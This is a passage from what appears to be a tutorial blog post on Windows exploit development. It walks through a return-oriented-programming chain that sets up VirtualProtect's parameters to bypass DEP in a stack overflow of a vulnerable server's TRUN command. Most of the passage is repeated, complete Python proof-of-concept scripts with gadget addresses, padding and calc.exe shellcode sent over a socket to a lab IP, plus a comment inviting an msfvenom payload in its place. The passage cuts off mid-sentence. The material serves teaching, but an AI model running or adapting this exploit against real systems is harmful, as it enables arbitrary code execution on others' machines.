# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

Now EAX contains an address that is around our shellcode, and will lead to execution of shellcode when it is returned to after the VirtualProtect() call, via a NOP sled:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here- we just want to change what the memory addresses in ECX and EDX point to. Right now, they contain memory addresses- but they are not pointers to anything.

With a mov dword ptr ds:[ecx], eax instruction we could accomplish what we need. What mov dword ptr ds:[ecx], eax will do, is take the DWORD value (size of an x86 register) ECX is currently pointing to (which is the return parameter) and change that value, to make that DWORD in ECX (the address of return) point to EAX’s value (the shellcode address).

To clarify- here we are not making ECX point to EAX. We are making the return address point to the address of the shellcode. That way on the stack, whenever the memory address of return is anywhere, it will automatically be referenced (pointed to) by the shellcode address.

We also need to do the same with EDX. EDX contains the parameter placeholder for lpAddress at the moment. This also needs to point to our shellcode, which is contained in EAX. This means an instruction of mov dword ptr ds:[edx], eax is needed. It will do the same thing mentioned above, but it will use EDX instead of ECX.

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The memory address containing the return parameter (filled with 0x4c4c4c4c originally) placeholder was successfully manipulated to point to the shellcode area!:

The next ROP gadget of mov dword ptr ds:[edx], eax successfully updates the lpAddress parameter, also!:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number that comes after ret refers to the number of bytes that should be removed from the stack. C, in decimal, is 12. 12 bytes would refer to three 4-byte values in x86 (Each 32-bit DWORD memory address contains 4 bytes. 4 bytes * 3 values = 12 total). These types of returns are used to “clean up” items on the stack, by removing items. Essentially, this just removes the next 3 memory addresses after the ret is executed.

In any case- just as pop, we will have to add some padding to compensate. As mentioned above, a ret 0x000C will remove three memory addresses off of the stack. First, the return instruction takes the current stack pointer at the time of the ret 0x000C instruction (which would be the next ROP gadget in the chain) and loads it into EIP. EIP then executes that address as normally. That is why no padding is needed at that point. The 0x000C portion of the return from the now previous ROP gadget kicks in and takes the next three memory addresses removed off the stack. This is the reason why padding for ret NUM instructions are implemented in the NEXT ROP gadget instead of directly below, like pop padding.

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter about 300 hex bytes. This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 300 will do. The flNewProtect parameter should contain a value of 0x40, which gives the memory page read, write, and execute permissions.

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Make the current size parameter placeholder point to this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Make the current flNewProtect parameter placeholder point to this newly calculated value.

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. This will take out the next three lines of addresses- so we insert three lines of padding:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 300 into EAX. We have already found a gadget from one of the previous gadgets! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (100 * 3 = 300). Remember, under each add eax, 0x00000100 gadget, to add a line of padding to compensate for the pop ebp instruction.

The last step is the pointer.

Right now, EDX (the register itself) still holds a value that is equal to the lpAddress parameter placeholder. We will increase EDX by four bytes- so it reaches the size parameter placeholder. We will also reuse an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and create a pointer from the DWORD within EDX (the size parameter placeholder) to the value in EAX (the correct size parameter value), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Again, that pesky ret 0x000C is present again. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again- we have to add padding for the last gadget’s ret 0x000C instruction. Three addresses will be removed, so three lines of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find any viable pointers through any of the ROP gadgets I enumerated to add 0x40 directly. So instead, in typical ROP fashion, I had to make-do with what I had.

I added A LOT of add eax, 0x02 instructions. Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll

Again, EDX is now pointed to the size parameter placeholder. Using EDX again, increment by four- to place the location of the flNewProtect placeholder parameter in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, create a pointer from the DWORD referenced by EDX (the flNewProtect parameter) to EAX (where the value of flNewPRotect resides:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX get “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The memory address of the size parameter now points to the value of EAX, which is 0x300!:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD within EDX (the flNewProtect placeholder) it manipulated to point to the value of EAX- which is 0x40! All of our parameters have successfully been added to the stack!:

All that is left now, is we need to jump back to the VirtualProtect call! but how will we do this?!

Remember very early in this tutorial, when we saved the old stack pointer into ECX? Then, we performed some calculations on ECX to increase it to equal the first “parameter”, the return address? Recall that the return address is four bytes greater than the place where VirtualProtect() is called. This means if we can decrement ECX by four bytes, it would contain the address of the call to VirtualProtect().

However, in assembly, one of the best registers to make calculations to is EAX. Since we are done with the parameters, we will move the value of ECX into EAX. We will then decrement EAX by four bytes. Then, we will exchange the EAX register (which contains the call to VirtualProtect() with ESP). At this point, the VirtualProtect() address will be in ESP. Since the exchange instruction will be apart of a ROP gadget, the ret at the end of the gadget will load new ESP (the VirtualProtect() address) into EIP- and thus executing the call to VirtualProtect() with all of the correct parameters on the stack!

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPS right before the shellcode. We only gave a 100-byte buffer between those parameters and our shellcode. We have added a lot of ROP chains since th